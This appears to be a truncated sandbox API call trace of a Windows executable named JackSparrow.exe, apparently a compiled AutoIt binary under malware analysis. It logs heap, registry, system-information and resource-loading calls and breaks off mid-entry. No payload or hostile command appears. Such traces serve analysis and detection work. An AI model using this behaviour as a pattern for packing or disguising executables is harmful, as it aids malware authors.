!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿâQdùÄ÷l", lpUsedDefaultChar=0x0) returned 256 [0025.985] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0025.985] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a4d1c) returned 0x0 [0025.985] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0025.985] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0025.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c) returned 0x781ef8 [0025.985] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0025.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783370 [0025.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x795c10 [0025.986] GetVersionExW (in: lpVersionInformation=0x6cf6a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0xb6000e, szCSDVersion="\x04") | out: lpVersionInformation=0x6cf6a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0025.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x783370 | out: hHeap=0x770000) returned 1 [0025.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x78fcb8 [0025.986] GetCurrentProcess () returned 0xffffffff [0025.986] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x6cf7f0 | out: Wow64Process=0x6cf7f0) returned 1 [0025.986] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0025.986] GetProcAddress (hModule=0x76e10000, lpProcName="GetNativeSystemInfo") returned 0x76e310b5 [0025.986] GetNativeSystemInfo (in: lpSystemInfo=0x6cf7bc | out: lpSystemInfo=0x6cf7bc*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0025.986] FreeLibrary (hLibModule=0x76e10000) returned 1 [0025.986] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0025.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x783370 [0025.987] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783388 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x795c20 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7833a0 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x795c30 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7833b8 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x795c40 [0025.987] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7833d0 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x795c50 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7833e8 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x795c60 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783400 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x795c70 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783418 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7935f8 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783430 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793608 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783448 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793618 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783460 [0025.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793628 [0025.987] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0025.988] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0025.988] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0025.988] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0025.988] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0025.988] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783478 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793638 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7939f8 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793648 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793a10 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793658 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793a28 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793668 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793a40 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793678 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793a58 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793688 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793a70 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793698 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793a88 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7936a8 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793aa0 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7936b8 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793ab8 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7936c8 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7936d8 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793ad0 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7936e8 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793ae8 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7936f8 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793b00 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793708 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793b18 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793718 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793b30 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793728 [0025.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793738 [0025.988] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc053 [0025.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793b48 [0025.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793748 [0025.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x781f40 [0025.989] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0025.989] OleInitialize (pvReserved=0x0) returned 0x0 [0025.996] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0025.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793b60 [0025.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793768 [0025.996] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x6cf7c4 | out: phkResult=0x6cf7c4*=0xf8) returned 0x0 [0025.996] RegQueryValueExW (in: hKey=0xf8, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x6cf7e0, lpcbData=0x6cf7c8*=0x8 | out: lpType=0x0, lpData=0x6cf7e0*=0x30, lpcbData=0x6cf7c8*=0x4) returned 0x0 [0025.996] RegCloseKey (hKey=0xf8) returned 0x0 [0025.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7960d0 [0025.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793778 [0025.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793788 [0025.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793798 [0025.996] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793b90 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7937a8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7960f8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7937b8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793ba8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7937c8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793bc0 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7937d8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793bd8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7937e8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793bf0 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7937f8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793c08 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793808 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793c20 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793818 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793c38 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793828 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793c50 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793838 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793c68 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793848 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793c80 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793858 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793c98 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793868 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793cb0 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793878 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793cc8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793888 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793ce0 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793898 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793cf8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7938a8 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793d10 [0025.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7938b8 [0025.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793d28 [0025.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7938c8 [0025.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793d40 [0025.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7938d8 [0025.998] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0025.998] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0025.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793d58 [0025.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7938e8 [0026.000] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6af798, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jacksparrow.exe")) returned 0x35 [0026.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x79a5e8 [0026.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7938f8 [0026.001] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", nBufferLength=0x7fff, lpBuffer=0x69f788, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", lpFilePart=0x0) returned 0x35 [0026.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793d58 | out: hHeap=0x770000) returned 1 [0026.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x79a660 [0026.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a5e8 | out: hHeap=0x770000) returned 1 [0026.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7938f8 | out: hHeap=0x770000) returned 1 [0026.002] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", nBufferLength=0x7fff, lpBuffer=0x6af7a4, lpFilePart=0x6bf7a4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", lpFilePart=0x6bf7a4*="JackSparrow.exe") returned 0x35 [0026.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796120 [0026.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793d58 [0026.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793d70 [0026.002] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7938f8 [0026.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x6bf7c0 | out: phkResult=0x6bf7c0*=0x0) returned 0x2 [0026.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793d70 | out: hHeap=0x770000) returned 1 [0026.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7938f8 | out: hHeap=0x770000) returned 1 [0026.002] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0026.003] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0026.003] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0026.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793d70 [0026.003] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7938f8 [0026.003] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0026.003] IsThemeActive () returned 0x1 [0026.003] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x6cf7e4, fWinIni=0x0 | out: pvParam=0x6cf7e4) returned 1 [0026.003] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 1 [0026.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793d88 [0026.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793908 [0026.004] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x6bf7b8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0026.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793da0 [0026.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793918 [0026.004] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x69f718, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jacksparrow.exe")) returned 0x35 [0026.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x79a5e8 [0026.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793928 [0026.006] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", nBufferLength=0x7fff, lpBuffer=0x68f708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", lpFilePart=0x0) returned 0x35 [0026.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7833b8 | out: hHeap=0x770000) returned 1 [0026.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x79a6d8 [0026.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a5e8 | out: hHeap=0x770000) returned 1 [0026.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793928 | out: hHeap=0x770000) returned 1 [0026.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x781f88 [0026.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793928 [0026.006] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0026.006] GetProcAddress (hModule=0x76e10000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e3d650 [0026.006] Wow64DisableWow64FsRedirection (in: OldValue=0x6af71c | out: OldValue=0x6af71c*=0x0) returned 1 [0026.006] FreeLibrary (hLibModule=0x76e10000) returned 1 [0026.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x79a5e8 [0026.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jacksparrow.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x6af5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0026.007] GetFileType (hFile=0xf8) returned 0x1 [0026.007] LoadLibraryExW (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", hFile=0x0, dwFlags=0x2) returned 0x1270000 [0026.007] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0026.007] GetProcAddress (hModule=0x76e10000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76e3d668 [0026.007] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0026.007] FreeLibrary (hLibModule=0x76e10000) returned 1 [0026.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x79a750 [0026.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793938 [0026.009] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x6af778 | out: ppstm=0x6af778*=0x796170) returned 0x0 [0026.010] FindResourceExW (hModule=0x1270000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x1338528 [0026.010] LoadResource (hModule=0x1270000, hResInfo=0x1338528) returned 0x13407b8 [0026.010] SizeofResource (hModule=0x1270000, hResInfo=0x1338528) returned 0x941a [0026.010] LockResource (hResData=0x13407b8) returned 0x13407b8 [0026.010] ISequentialStream:RemoteWrite (in: This=0x796170, pv=0x13407b8*=0xa3, cb=0x941a, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0026.010] IStream:RemoteSeek (in: This=0x796170, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0026.010] IStream:RemoteSeek (in: This=0x796170, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0026.010] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x79a750, cb=0x18, pcbRead=0x6af6a4 | out: pv=0x79a750*=0xa3, pcbRead=0x6af6a4*=0x18) returned 0x0 [0026.010] IStream:RemoteSeek (in: This=0x796170, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0026.010] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6af6e8, cb=0x4, pcbRead=0x6af6a4 | out: pv=0x6af6e8*=0x45, pcbRead=0x6af6a4*=0x4) returned 0x0 [0026.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793938 | out: hHeap=0x770000) returned 1 [0026.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a750 | out: hHeap=0x770000) returned 1 [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6af70c, cb=0x10, pcbRead=0x6af6e4 | out: pv=0x6af70c*=0x4d, pcbRead=0x6af6e4*=0x10) returned 0x0 [0026.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6af5e0 | out: lpSystemTimeAsFileTime=0x6af5e0*(dwLowDateTime=0x1020c0c0, dwHighDateTime=0x1d5e3d9)) [0026.011] IStream:RemoteSeek (in: This=0x796170, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0026.011] IStream:RemoteSeek (in: This=0x796170, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6af060, cb=0x4, pcbRead=0x6aee24 | out: pv=0x6af060*=0x6b, pcbRead=0x6aee24*=0x4) returned 0x0 [0026.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6aed20 | out: lpSystemTimeAsFileTime=0x6aed20*(dwLowDateTime=0x1020c0c0, dwHighDateTime=0x1d5e3d9)) [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6af068, cb=0x4, pcbRead=0x6aee24 | out: pv=0x6af068*=0xa6, pcbRead=0x6aee24*=0x4) returned 0x0 [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6aee50, cb=0x34, pcbRead=0x6aee24 | out: pv=0x6aee50*=0xe1, pcbRead=0x6aee24*=0x34) returned 0x0 [0026.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6aed20 | out: lpSystemTimeAsFileTime=0x6aed20*(dwLowDateTime=0x1020c0c0, dwHighDateTime=0x1d5e3d9)) [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6af068, cb=0x4, pcbRead=0x6aee24 | out: pv=0x6af068*=0x19, pcbRead=0x6aee24*=0x4) returned 0x0 [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6af094, cb=0x72, pcbRead=0x6aee24 | out: pv=0x6af094*=0x2c, pcbRead=0x6aee24*=0x72) returned 0x0 [0026.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6aed20 | out: lpSystemTimeAsFileTime=0x6aed20*(dwLowDateTime=0x1020c0c0, dwHighDateTime=0x1d5e3d9)) [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6af71b, cb=0x1, pcbRead=0x6af06c | out: pv=0x6af71b*=0x0, pcbRead=0x6af06c*=0x1) returned 0x0 [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6af714, cb=0x4, pcbRead=0x6af06c | out: pv=0x6af714*=0xbc, pcbRead=0x6af06c*=0x4) returned 0x0 [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6af714, cb=0x4, pcbRead=0x6af06c | out: pv=0x6af714*=0xbc, pcbRead=0x6af06c*=0x4) returned 0x0 [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x6af714, cb=0x4, pcbRead=0x6af06c | out: pv=0x6af714*=0x84, pcbRead=0x6af06c*=0x4) returned 0x0 [0026.011] IStream:RemoteSeek (in: This=0x796170, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0026.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x793938 [0026.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x793948 [0026.011] ISequentialStream:RemoteRead (in: This=0x796170, pv=0x793948, cb=0x0, pcbRead=0x6af06c | out: pv=0x793948*=0x6e, pcbRead=0x6af06c*=0x0) returned 0x0 [0026.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6aef68 | out: lpSystemTimeAsFileTime=0x6aef68*(dwLowDateTime=0x1020c0c0, dwHighDateTime=0x1d5e3d9)) [0026.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793938 | out: hHeap=0x770000) returned 1 [0026.011] HeapFree (in: 